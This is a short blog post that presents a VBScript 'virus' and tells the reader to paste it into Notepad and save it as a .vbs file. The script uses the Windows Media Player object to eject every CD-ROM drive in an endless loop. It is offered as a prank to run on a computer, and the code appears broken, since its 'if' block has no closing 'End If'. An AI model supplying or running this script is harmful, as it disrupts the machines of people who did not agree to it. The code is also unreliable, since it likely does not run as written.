Open And Close the cd rom (Virus)

    Virus That Will Open And Close the cd rom



1.Open notepad
2.past these codes in notepad
------------------------------------------------------------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
------------------------------------------------------------------------------------------------------------
3.save your file with .vbs  extensions 






                                                                    |DONE|



Share This Post »»

Penulis : Admin ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel Open And Close the cd rom (Virus) ini dipublish oleh Admin pada hari Saturday 28 December 2013 . Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan Open And Close the cd rom (Virus)
 

0 comments :

Post a Comment